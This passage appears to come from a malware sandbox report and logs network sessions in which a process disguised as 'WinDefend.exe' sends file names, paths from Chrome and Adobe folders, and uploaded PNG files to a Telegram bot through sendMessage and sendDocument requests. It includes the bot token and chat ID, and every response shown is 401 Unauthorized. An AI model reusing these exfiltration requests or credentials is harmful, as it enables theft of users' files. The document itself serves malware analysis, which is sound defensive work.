2024-05-23 13:35:11 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 39 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+192.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:35:11 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:11 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	61181	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:11 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="ffb60a0e-026e-416f-bcce-3dd055f53b54" Host: api.telegram.org Content-Length: 65004 Expect: 100-continue
2024-05-23 13:35:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:11 UTC	40	OUT	Data Raw: 2d 2d 66 66 62 36 30 61 30 65 2d 30 32 36 65 2d 34 31 36 66 2d 62 63 63 65 2d 33 64 64 30 35 35 66 35 33 62 35 34 0d 0a Data Ascii: --ffb60a0e-026e-416f-bcce-3dd055f53b54
2024-05-23 13:35:11 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 37 39 66 31 33 35 61 62 39 38 64 30 31 35 39 36 35 35 37 31 61 33 64 35 38 35 66 38 63 38 66 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 37 39 66 31 33 35 61 62 39 38 64 30 31 35 39 36 35 35 37 31 61 33 64 35 38 35 66 38 63 38 66 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=179f135ab98d015965571a3d585f8c8f.png; filename*=utf-8''179f135ab98d015965571a3d585f8c8f.png
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 bb 00 00 03 18 08 06 00 00 00 23 29 e5 35 00 00 80 00 49 44 41 54 78 da ec bd fd 73 54 f5 dd ff ef f4 5f 70 46 e7 db ce 7c c6 ce f5 8b 33 cd 74 ae 71 a7 e9 a4 a5 17 0c 9d 62 9d 8b 50 a6 2c 77 c5 fa 25 cd 65 11 90 34 68 48 41 90 a6 c1 48 e4 c6 c4 48 e4 c6 28 31 62 24 22 b2 05 12 b9 0b 18 16 74 31 80 4b 25 37 80 2c 57 22 d1 e8 2a b0 d1 68 fa b9 98 eb f5 d9 f7 d9 3d bb e7 ec 9e b3 37 c9 26 2c e1 f1 98 79 0c 92 9c 3d 7b ee 3d e7 c9 eb fd 3a 77 bd f7 de 7b 72 f6 ec 59 f9 e4 93 4f 10 11 11 11 53 f6 ca 95 2b 88 88 88 88 88 b7 5c af d7 2b 2a df 52 ff ad b8 4b fd 45 dd b0 0e 0d 0d 21 22 22 22 a6 2c 00 00 00 00 40 36 a0 42 2e c2 2e 44 44 44 24 ec 02 00 00 00 00 c2 2e 44 44 44 44 c2 2e 00 00 00 00 20 ec 42 44 Data Ascii: PNGIHDR#)5IDATxsT_pF\|3tqbP,w%e4hHAHH(1b$"t1K%7,W"h=7&,y={=:w{rYOS+\+RKE!""",@6B..DDD$.DDDD. BD
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: bd 3e be 19 b8 ed db 0a a3 01 df e5 9d c5 e6 be 3f c3 7c c3 a1 71 59 2d 9b 35 3b 57 cb ee 4b 43 c3 5a cf f4 d7 6d 84 0f 96 a6 a1 58 56 4d b5 8d 9f b7 58 d7 b4 42 a7 21 f1 3c eb 48 7e 8c f5 35 4b f1 af 12 7c e7 23 5b a5 73 30 cd 13 e7 a6 5f 8e af 4b 7c bc 8f 24 ec 4a 7d fb 24 d9 1f c1 75 2f 9d 92 bc 91 7e f1 de 34 02 b4 e1 86 5d 29 ed af d1 0c bb ec d6 df 3a 5c 4a b4 1e 9d af 16 da 9f fb 09 87 cc 0d 89 f7 c5 44 c7 cd 34 59 7d f0 aa ed f7 a6 7e cd 09 55 03 2e b4 3b f7 f3 a7 c9 b4 5b 11 76 a9 b5 b8 d4 98 f0 7c cc c9 74 d8 95 f4 9a 04 40 d8 85 88 88 88 84 5d e3 2d ea 32 0c 61 4c a1 b2 e1 66 f0 a1 22 37 71 0f 24 d5 fc b9 71 4d b1 cc 74 ea 95 0a 79 32 6d 76 a1 94 ae 6b 94 e6 f3 57 65 c8 2e c8 b8 39 20 97 8f 35 4a c5 5f 66 6a 55 31 7a e5 c2 4c 55 89 b1 b3 59 3a Data Ascii: >?\|qY-5;WKCZmXVMXB!<H~5K\|#[s0_K\|$J}$u/~4]):\JD4Y}~U.;[v\|t@]-2aLf"7q$qMty2mvkWe.9 5J_fjU1zLUY:
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: f5 d2 f8 f1 8d 34 83 ad e4 cb da 56 ff 58 8a 95 5d c6 a1 8a d9 5f d9 f5 81 7a 23 63 f0 3c 30 36 a8 7f f7 83 0e 69 6a 79 6f d4 df c4 48 d8 05 00 84 5d 88 88 88 88 84 5d 59 17 76 a9 d0 e8 ad 83 27 65 59 e9 72 d9 b8 69 5b 24 a4 da 73 b4 5d ab ec 3a 79 c1 5c 11 a2 86 2d 3e f1 64 89 f6 06 c5 13 86 a6 d7 db 77 ed 8f f4 e1 52 c3 14 f7 b9 cf c5 7d 97 9a a7 1a fe b8 f4 89 27 b4 a6 f6 a9 f6 07 db db 76 46 d6 57 6f d2 02 af e7 37 6d d1 02 2f f5 e0 1e 0d ba ca 65 f3 f6 46 d3 f2 8c 5e d8 a5 de 4e f8 ef 5a 93 f3 3f be 1e 1a 82 d8 b8 3c f4 76 bf c5 fb 92 7d de fc b3 7d b5 73 42 cd d7 1f 28 0b bf 01 d2 5c 95 75 d7 92 03 c3 0f bb 4e 6e 91 9f 19 83 9d f0 df 4d 61 54 b8 da 4b 0f c0 42 a1 dd bd f2 b3 35 9e c8 fc 43 3d bc e2 7b 76 65 3e ec d2 bf 2b b6 ff 58 e6 c2 2e 7d 1b dc Data Ascii: 4VX]_z#c<06ijyoH]]Yv'eYri[$s]:y\->dwR}'vFWo7m/eF^NZ?<v}}sB(\uNnMaTKB5C={ve>+X.}
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: 42 44 24 ec 02 00 ee 9f c6 47 d8 95 46 70 61 34 76 da 68 2f 9c 7c a9 f5 f8 c5 df 6f d6 fb 5a 81 b9 57 53 46 c2 ae 2e 69 98 15 fe ec ef 6a a5 bd 3f f6 7b bd d2 30 7f 98 3d c0 b4 87 cd e8 c3 e4 dc 6a 9b be 3b 29 ac 87 31 50 8c 0b 61 82 0f 9f 05 09 2a eb 12 ef 1f e3 32 5a 07 02 a6 70 20 b2 5d a2 bd 82 e2 b7 cb 18 86 5d 2b ec 02 c8 61 ee d7 ee 06 71 46 aa 7a 56 4a d3 48 fb b5 59 69 0c 83 96 f8 e4 d3 84 d3 0f ca 37 5f 5e 97 af 35 3f 95 6d 4e eb ca 2e 55 09 16 09 97 8a 2f cb 85 2f 93 34 9b 1f fc 54 6a 23 81 d4 45 39 35 18 ff 46 cd 68 5f af 2e d9 7f 45 5f 86 a8 47 9f 4d 1e bc 15 d4 7c 76 4b 1b d4 47 af 29 29 84 2b 01 ab 6b 4d f0 73 ef f4 8d da f9 64 15 66 97 b8 7c 71 d7 3e ff a1 72 9b e5 31 86 5d 16 c3 b6 4f 64 6e fb 04 fc 16 e7 4e b8 6f 19 61 17 61 17 61 17 22 Data Ascii: BD$GFpa4vh/\|oZWSF.ij?{0=j;)1Pa*2Zp ]]+aqFzVJHYi7_^5?mN.U//4Tj#E95Fh_.E_GM\|vKG))+kMsdf\|q>r1]OdnNoaaa"
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: ec db f2 cb 3f e8 cb 18 74 76 a3 fc 67 dd c7 f2 3d 3b 0f 00 00 00 08 bb ac 03 a5 23 47 8e 68 0b 93 cd 43 06 4f 9f 3e ad 55 79 a9 f0 8b 07 1b 44 44 44 c2 ae cc 65 5d dd b2 71 fe eb f2 c3 d9 a1 20 69 95 e7 5f d9 11 76 dd fc 52 8e be d0 18 09 b7 7e bd ba 59 36 d6 1d d6 5c f5 6c 93 fc f2 99 0f 84 fa 30 00 00 00 20 ec b2 b0 b3 b3 53 de 7d f7 dd db a2 37 16 81 17 22 22 22 61 57 c6 e9 3c 2c 0e 15 40 d5 1d 90 19 2a 58 7a ee 74 5a 15 53 a3 13 76 7d 2d 2d cf 84 c2 b7 9f 3c d3 26 9d 81 9b ec 27 00 00 00 20 ec 4a 55 35 3c 50 05 5e b7 cb 0d 3d 81 17 22 22 22 61 57 e6 b8 29 67 b7 ab ea a9 26 79 e5 6a 8f bc 52 ac 02 a6 bd d2 f2 ad fd f4 6a 58 61 c5 ea 46 f9 b7 df 1b 86 15 5a 06 58 e9 4c 6b e6 7b 4f b3 fc 30 38 dd 0f 57 ba c5 97 6a ce 15 b8 24 ef 6c de 63 1a ee f8 93 0d Data Ascii: ?tvg=;#GhCO>UyDDDe]q i_vR~Y6\l0 S}7"""aW<,@*XztZSv}--<&' JU5<P^="""aW)g&yjRjXaFZXLk{O08Wj$lc
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: 8c 99 34 76 18 e3 70 d5 ab ba 92 bd 35 51 0d 55 54 c1 96 b1 07 59 c5 9a 50 ef 2e 55 d1 75 e4 c8 11 6d 3e ea bf b3 ed e1 c3 f2 81 f4 4a f8 e1 3a e6 61 b8 ef 9d 05 29 84 58 86 7e 49 09 7b 02 a5 db 1b 2a 54 c5 b4 f2 90 df 7e da 70 c3 f8 9c b8 9e 5d 63 10 76 e9 15 58 9b a6 c4 37 56 4f a2 de 8f 2c d2 4c dd f2 fb c2 4d ea 73 4b a4 41 0d 05 f3 74 49 df 35 ab f9 11 76 25 0d bb 0c bd db d2 0f bb d4 d0 d5 1c cb 9e 5d c9 c3 4d af d4 fe 26 b5 86 fe a9 84 5d 43 83 5d d2 30 27 b4 2c e5 6b 6c 7a 76 59 ed 6f fd e5 13 a3 dc b3 2b e5 eb 05 12 76 01 00 00 00 00 8c 87 b0 4b 55 3d a9 40 4a fd 99 e9 9b e9 4c ce 5b 0d 3b 3c 77 ee 5c d2 2a 35 f5 7d ed ed 83 a6 61 9a aa 4f d7 c9 93 de 48 9f 2e f5 46 c7 6c 7c f8 b0 0b 2b f4 9e 40 0e c3 1b 0c a3 8d b1 17 48 d3 95 44 f3 f5 85 1f c2 Data Ascii: 4vp5QUTYP.Uum>J:a)X~I{T~p]cvX7VO,LMsKAtI5v%]M&]C]0',klzvYo+vKU=@JL[;<w\5}aOH.Fl\|+@HD
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: ec 62 00 07 00 00 00 c0 58 e9 51 90 5d e6 52 46 f5 34 46 53 76 a9 99 5b 5e db aa 59 5f 4a 74 55 9a fd f5 28 c9 ae f4 bb ed ba 44 b1 15 47 7f 30 b2 ab 54 4e d4 2e 53 f4 27 1f ae 95 81 e9 6a db 27 6d 3c d9 70 ad 5d 2c dc 4e ea 4f ab 6c 68 b5 3c 0d af 3a d9 95 bd 96 b6 9f e7 c2 ac 0c 3e 6d ad c5 64 7e 76 50 da bd 9e c6 38 3d a0 3f 59 d0 51 40 7f a5 c9 ae a5 5f 9f 32 6d ae e4 e1 3a 97 27 69 ba 15 f4 3f aa 3f 65 52 5b 4a 99 ab 30 3b cc 98 f1 e8 94 90 ea 3b 53 9b ec 52 d2 2f ac 3f 14 a2 37 59 56 d0 e5 26 ba f5 63 58 17 93 e4 ed 0a d7 72 21 27 d9 6c 0e d1 42 90 5d c8 2e 00 00 00 00 c6 4a f5 2c bb be fb ee 3b 2d e6 cf 73 73 73 72 f7 ee 5d d7 d9 5a aa 16 97 92 5d 6a 79 a2 d7 fe df 7b f7 ae b6 dd c3 18 f8 d7 8f ec 5a 2b ed bb fa a5 7f 6f b7 74 ac 33 96 d3 6d d8 21 Data Ascii: bXQ]RF4FSv[^Y_JtU(DG0TN.S'j'm<p],NOlh<:>md~vP8=?YQ@_2m:'i??eR[J0;;SR/?7YV&cXr!'lB].J,;-sssr]Z]jy{Z+ot3m!
2024-05-23 13:35:11 UTC	4096	OUT	Data Raw: 4a 20 df 57 b6 7e 98 5d 9d 27 78 a9 4f 3b bf e0 1b 29 da 1b 00 80 b1 12 b2 8b 10 42 08 21 c8 ae ba 1a c0 dd 3a 2e 5b 95 c0 b2 25 24 eb 9f eb 92 23 17 b3 c8 ae 5a 58 4c c9 be 70 be bd c2 07 24 f5 88 75 d9 e5 92 2f 8b d3 fb 64 7d 7e 3f eb df 4a c9 c3 68 c2 ec 27 5d f2 78 43 50 7a 2e 2c 2e 5d 76 3d 80 7e 80 ec aa 42 d9 1f 5e 2f a1 40 8b 0c 33 39 16 80 b1 12 b2 8b 10 42 08 21 c8 ae 55 2e bb c2 9d d2 f7 c6 3e d9 a7 b2 6b 6b fe 06 5f 17 5f eb df b0 4a 06 64 d7 52 64 57 30 82 ec aa 4d 76 05 65 e3 43 92 5d 33 bf 79 2a 7f 1e 41 d9 37 2d 35 cb ae fb d9 0f 90 5d 7e 99 97 33 5d ea df b6 ad 32 4a 53 01 30 56 42 76 11 42 08 21 04 d9 b5 ca 65 d7 8b a3 62 bb f7 9b 4f c9 81 cd 01 ed 46 bf ef e2 22 b2 0b 1e 49 f9 92 da 13 a8 5d 76 d1 de f5 d4 33 e5 f8 0b c8 2e 00 c6 4a c8 Data Ascii: J W~]'xO;)B!:.[%$#ZXLp$u/d}~?Jh']xCPz.,.]v=~B^/@39B!U.>kk__JdRdW0MveC]3y*A7-5]~3]2JS0VBvB!ebOF"I]v3.J
2024-05-23 13:35:11 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:11 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	61182	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:11 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 197 Expect: 100-continue
2024-05-23 13:35:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:11 UTC	197	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 5f 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 5f 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 34 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+large_trefoil_2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Clarge_trefoil_2x.png%0ASize%3A+4+KB
2024-05-23 13:35:11 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:11 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	61184	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:12 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:12 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 32 35 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+256.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	61185	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:12 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="9f4e5b67-41a5-4c86-8b46-62259f51db46" Host: api.telegram.org Content-Length: 4678 Expect: 100-continue
2024-05-23 13:35:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:12 UTC	40	OUT	Data Raw: 2d 2d 39 66 34 65 35 62 36 37 2d 34 31 61 35 2d 34 63 38 36 2d 38 62 34 36 2d 36 32 32 35 39 66 35 31 64 62 34 36 0d 0a Data Ascii: --9f4e5b67-41a5-4c86-8b46-62259f51db46
2024-05-23 13:35:12 UTC	119	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 5f 32 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 6c 61 72 67 65 5f 74 72 65 66 6f 69 6c 5f 32 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=large_trefoil_2x.png; filename*=utf-8''large_trefoil_2x.png
2024-05-23 13:35:12 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 06 00 00 00 88 ec 5a 3d 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 10 90 49 44 41 54 78 da ec 9d 4b 56 db d8 16 40 2f b5 aa 1f bf 11 44 b4 5e a3 1a 31 23 88 19 01 66 04 98 11 00 23 20 8c 20 30 02 9c 11 00 23 40 8c 20 4e e3 35 aa 15 65 04 e5 9a c1 d3 09 d7 55 8a d0 ff 5c 5d 5d c9 7b af e5 45 e2 8f 2c 4b da 3a e7 fe 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 bd e4 80 43 30 1e fe 17 fd 77 96 fe 59 a6 8f 93 f4 31 4f 1f 51 ee 2d 49 fa d8 a4 8f 97 f4 11 ff 91 fc b9 e1 a8 01 a2 8f 4b f2 4f e9 9f 8b f4 31 6b f1 31 11 fd 2e 15 7e cd 11 44 74 08 5b 70 89 dc 0f Data Ascii: PNGIHDRZ=tEXtSoftwareAdobe ImageReadyqe<IDATxKV@/D^1#f# 0#@ N5eU\]]{E,K:C0wY1OQ-IKO1k1.~Dt[p
2024-05-23 13:35:12 UTC	238	OUT	Data Raw: f8 17 17 a3 d7 8a 22 6f ab 1a 6e 7b 63 90 28 7e ed 20 c3 60 5d 34 80 1e 44 9f db 34 bb 28 7d be aa 8a ac f6 b3 17 e6 75 2d 34 4d 8d 7d 2f 4b 2b 03 20 fa af c2 ae 4c 79 f3 97 a4 d2 71 fa f8 91 79 ee bd 79 ad a1 8f 1c 7c 7d 6c a3 78 c2 e9 04 e8 51 f4 06 b2 f7 41 6d c6 00 00 8e 45 cf c8 ae a9 48 6b 2a f8 5d fa b8 a5 2c 0e 30 80 e8 56 f6 c8 46 f6 05 82 03 4c 54 f4 8c f0 22 fa ae a2 4d 5b 06 ff 62 5e 17 3a 44 70 80 90 44 cf 45 78 91 fd a3 8d f2 75 69 7d 62 e5 7e 31 af 33 c0 24 9c 26 80 c0 45 af 88 f6 6f e8 7b 98 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 68 fc 5f 80 01 00 4f c4 99 b4 04 6a 7a 8e 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: "on{c(~ `]4D4(}u-4M}/K+ Lyqyy\|}lxQAmEHk*],0VFLT"M[b^:DpDExui}b~13$&Eo{+@h_OjzIENDB`
2024-05-23 13:35:12 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 66 34 65 35 62 36 37 2d 34 31 61 35 2d 34 63 38 36 2d 38 62 34 36 2d 36 32 32 35 39 66 35 31 64 62 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --9f4e5b67-41a5-4c86-8b46-62259f51db46Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:12 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:12 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 66 34 65 35 62 36 37 2d 34 31 61 35 2d 34 63 38 36 2d 38 62 34 36 2d 36 32 32 35 39 66 35 31 64 62 34 36 2d 2d 0d 0a Data Ascii: --9f4e5b67-41a5-4c86-8b46-62259f51db46--
2024-05-23 13:35:12 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:12 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	61186	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:12 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:12 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 62 34 62 66 35 30 38 34 34 31 34 34 63 34 64 32 35 61 66 30 38 30 32 61 38 37 62 66 63 63 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 31 62 34 62 66 35 30 38 34 34 31 34 34 63 34 64 32 35 61 66 30 38 30 32 61 38 37 62 66 63 63 36 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 32 2b Data Ascii: chat_id=1655240967&text=File%3A+1b4bf50844144c4d25af0802a87bfcc6.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C1b4bf50844144c4d25af0802a87bfcc6.png%0ASize%3A+12+
2024-05-23 13:35:13 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:13 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	61187	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:13 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e1b8c051-63cd-40a7-850e-2a1047e28315" Host: api.telegram.org Content-Length: 5509 Expect: 100-continue
2024-05-23 13:35:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:13 UTC	40	OUT	Data Raw: 2d 2d 65 31 62 38 63 30 35 31 2d 36 33 63 64 2d 34 30 61 37 2d 38 35 30 65 2d 32 61 31 30 34 37 65 32 38 33 31 35 0d 0a Data Ascii: --e1b8c051-63cd-40a7-850e-2a1047e28315
